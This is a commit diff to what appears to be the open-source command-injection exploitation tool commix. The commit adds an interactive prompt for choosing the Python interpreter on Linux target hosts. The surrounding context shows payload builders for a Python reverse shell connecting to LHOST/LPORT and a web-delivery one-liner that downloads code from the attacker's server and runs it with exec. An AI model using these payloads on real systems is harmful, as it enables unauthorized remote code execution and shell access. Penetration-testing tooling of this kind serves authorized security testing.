Minor update regarding setting python interpreter (on linux target hosts).

stasinopoulos · stasinopoulos · commit db6cd44246f4 · 2021-07-01T08:44:05.000+03:00
diff --git a/src/core/shells/bind_tcp.py b/src/core/shells/bind_tcp.py
@@ -126,6 +126,32 @@ def set_python_working_dir():
       print(settings.print_error_msg(err_msg))
       pass
 
+"""
+Set up the Python interpreter on linux target host.
+"""
+def set_python_interpreter():
+  while True:
+    if not menu.options.batch:
+      question_msg = "Do you want to use '" + settings.LINUX_PYTHON_INTERPRETER
+      question_msg += "' as Python working interpreter on the target host? [Y/n] > "
+      python_interpreter = _input(settings.print_question_msg(question_msg))
+    else:
+      python_interpreter = ""
+    if len(python_interpreter) == 0:
+       python_interpreter = "Y"
+    if python_interpreter in settings.CHOICE_YES:
+      break
+    elif python_interpreter in settings.CHOICE_NO:
+      question_msg = "Please provide a custom working interpreter for Python (e.g. '" 
+      question_msg += settings.LINUX_PYTHON_INTERPRETER  + "') > "
+      settings.LINUX_PYTHON_INTERPRETER = _input(settings.print_question_msg(question_msg))
+      settings.USER_DEFINED_PYTHON_INTERPRETER = True
+      break
+    else:
+      err_msg = "'" + python_interpreter + "' is not a valid answer."  
+      print(settings.print_error_msg(err_msg))
+      pass
+
 """
 check / set rhost option for bind TCP connection
 """
@@ -420,10 +446,13 @@ def other_bind_shells(separator):
                           "set lport "+ str(settings.LPORT) + "\n"
                           "exploit\n\n")
 
-        if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
-          set_python_working_dir()
+        if settings.TARGET_OS == "win":
+          if not settings.USER_DEFINED_PYTHON_DIR: 
+            set_python_working_dir()
           other_shell = settings.WIN_PYTHON_DIR + " -c " + data 
         else:
+          if not settings.USER_DEFINED_PYTHON_INTERPRETER:
+            set_python_interpreter()
           other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c " + "\"" + data + "\""
         msf_launch_msg(output)
       except:
diff --git a/src/core/shells/reverse_tcp.py b/src/core/shells/reverse_tcp.py
@@ -141,6 +141,32 @@ def set_python_working_dir():
       print(settings.print_error_msg(err_msg))
       pass
 
+"""
+Set up the Python interpreter on linux target host.
+"""
+def set_python_interpreter():
+  while True:
+    if not menu.options.batch:
+      question_msg = "Do you want to use '" + settings.LINUX_PYTHON_INTERPRETER
+      question_msg += "' as Python working interpreter on the target host? [Y/n] > "
+      python_interpreter = _input(settings.print_question_msg(question_msg))
+    else:
+      python_interpreter = ""
+    if len(python_interpreter) == 0:
+       python_interpreter = "Y"
+    if python_interpreter in settings.CHOICE_YES:
+      break
+    elif python_interpreter in settings.CHOICE_NO:
+      question_msg = "Please provide a custom working interpreter for Python (e.g. '" 
+      question_msg += settings.LINUX_PYTHON_INTERPRETER  + "') > "
+      settings.LINUX_PYTHON_INTERPRETER = _input(settings.print_question_msg(question_msg))
+      settings.USER_DEFINED_PYTHON_INTERPRETER = True
+      break
+    else:
+      err_msg = "'" + python_interpreter + "' is not a valid answer."  
+      print(settings.print_error_msg(err_msg))
+      pass
+
 """
 check / set lhost option for reverse TCP connection
 """
@@ -323,6 +349,8 @@ def other_reverse_shells(separator):
 
     # Python-reverse-shell 
     elif other_shell == '4':
+      if not settings.USER_DEFINED_PYTHON_INTERPRETER:
+        set_python_interpreter()
       other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c 'import socket,subprocess,os%0d" \
                     "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)%0d" \
                     "s.connect((\"" + settings.LHOST  + "\"," + settings.LPORT + "))%0d" \
@@ -417,10 +445,13 @@ def other_reverse_shells(separator):
               "for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), " \
               "globals(), __import__('contextlib'))\""
 
-      if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
-        set_python_working_dir()
+      if settings.TARGET_OS == "win":
+        if not settings.USER_DEFINED_PYTHON_DIR: 
+          set_python_working_dir()
         other_shell = settings.WIN_PYTHON_DIR + data
       else:
+        if not settings.USER_DEFINED_PYTHON_INTERPRETER:
+          set_python_interpreter()
         other_shell = settings.LINUX_PYTHON_INTERPRETER + data
       break
 
@@ -458,10 +489,13 @@ def other_reverse_shells(separator):
                           "set lport " + str(settings.LPORT) + "\n"
                           "exploit\n\n")
 
-        if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
-          set_python_working_dir()
+        if settings.TARGET_OS == "win":
+          if not settings.USER_DEFINED_PYTHON_DIR: 
+            set_python_working_dir()
           other_shell = settings.WIN_PYTHON_DIR + " -c " + data 
         else:
+          if not settings.USER_DEFINED_PYTHON_INTERPRETER:
+            set_python_interpreter()
           other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c " + "\"" + data + "\""
         msf_launch_msg(output)
       except:
@@ -633,10 +667,13 @@ def other_reverse_shells(separator):
 
           if web_delivery == '1':
             data = "import sys%3bimport ssl%3bu%3d__import__('urllib'%2b{2%3a'',3%3a'.request'}[sys.version_info[0]],fromlist%3d('urlopen',))%3br%3du.urlopen('http://" + str(settings.LHOST) + ":" + str(settings.SRVPORT) + settings.URIPATH + "',context%3dssl._create_unverified_context())%3bexec(r.read())%3b"
-            if settings.TARGET_OS == "win" and not settings.USER_DEFINED_PYTHON_DIR: 
-              set_python_working_dir()
+            if settings.TARGET_OS == "win":
+              if not settings.USER_DEFINED_PYTHON_DIR: 
+                set_python_working_dir()
               other_shell = settings.WIN_PYTHON_DIR + " -c " + data 
             else:
+              if not settings.USER_DEFINED_PYTHON_INTERPRETER:
+                set_python_interpreter()
               other_shell = settings.LINUX_PYTHON_INTERPRETER + " -c " + "\"" + data + "\""
             msf_launch_msg(output)
             break
diff --git a/src/utils/settings.py b/src/utils/settings.py
@@ -216,7 +216,7 @@ def sys_argv_errors():
 DESCRIPTION = "The command injection exploiter"
 AUTHOR  = "Anastasios Stasinopoulos"
 VERSION_NUM = "3.3"
-REVISION = "45"
+REVISION = "46"
 STABLE_RELEASE = False
 if STABLE_RELEASE:
   VERSION = "v" + VERSION_NUM + "-stable"
@@ -810,6 +810,7 @@ def sys_argv_errors():
 
 # Default target host's python interpreter
 LINUX_PYTHON_INTERPRETER = "python3"
+USER_DEFINED_PYTHON_INTERPRETER = False
 
 # Windows PHP installed directory.
 WIN_PHP_DIR = "C:\\xampp\\php\\php.exe"
